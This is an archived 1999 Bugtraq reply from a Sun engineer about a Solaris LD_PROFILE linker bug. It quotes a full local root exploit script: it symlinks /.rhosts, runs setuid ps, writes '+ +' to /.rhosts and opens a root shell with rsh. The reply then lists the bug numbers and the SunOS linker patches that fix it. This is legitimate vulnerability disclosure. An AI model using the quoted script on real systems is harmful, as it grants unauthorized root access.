[11993] in bugtraq
Re: LD_PROFILE local root exploit for solaris 2.6
daemon@ATHENA.MIT.EDU (Casper Dik)
Sun Sep 26 02:14:18 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id: <199909240830.KAA12231@romulus>
Date: Fri, 24 Sep 1999 10:30:32 +0200
Reply-To: Casper Dik <casper@HOLLAND.SUN.COM>
From: Casper Dik <casper@HOLLAND.SUN.COM>
X-To: Steve Mynott <steve@TIGHTROPE.DEMON.CO.UK>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Your message of "Wed, 22 Sep 1999 21:14:40 -0000."
<19990922211439.A654@tightrope.demon.co.uk>
>works on solaris 2.6 sparc anyway...
>
>#! /bin/ksh
># LD_PROFILE local root exploit for solaris
># steve@tightrope.demon.co.uk 19990922
>umask 000
>ln -s /.rhosts /var/tmp/ps.profile
>export LD_PROFILE=/usr/bin/ps
>/usr/bin/ps
>echo + + > /.rhosts
>rsh -l root localhost csh -i
This is bug 4150646 (or rather, 1241843, which resurfaced after an
extensive rewrite of the dynamic linker)
It's been fixed in Solaris 7 and with the following patches in other
releases:
103242-07: SunOS 5.5: linker patch
103243-07: SunOS 5.5_x86: linker patch
103627-11: SunOS 5.5.1: Linker patch
103628-10: SunOS 5.5.1_x86: Linker patch
105490-07: SunOS 5.6: linker patch
105491-05: SunOS 5.6_x86: linker patch
The bug was originally fixed in 5.5.1 and back patched; I rediscovered that
it was back in 2.6 (which also meant it was in the process of being patched
back into 5.5/5.5.1, but I think those patches were held up until the
regression was fixed); this was all well before S7 was released.
The original bug was also fixed in the following patches:
102049-05: SunOS 5.4: linker fixes
102303-05: SunOS 5.4: POINT PATCH: linker fixes
102304-05: SunOS 5.4_x86: POINT PATCH: linker fixes
102778-03: SunOS 5.4_x86: linker patch
Casper
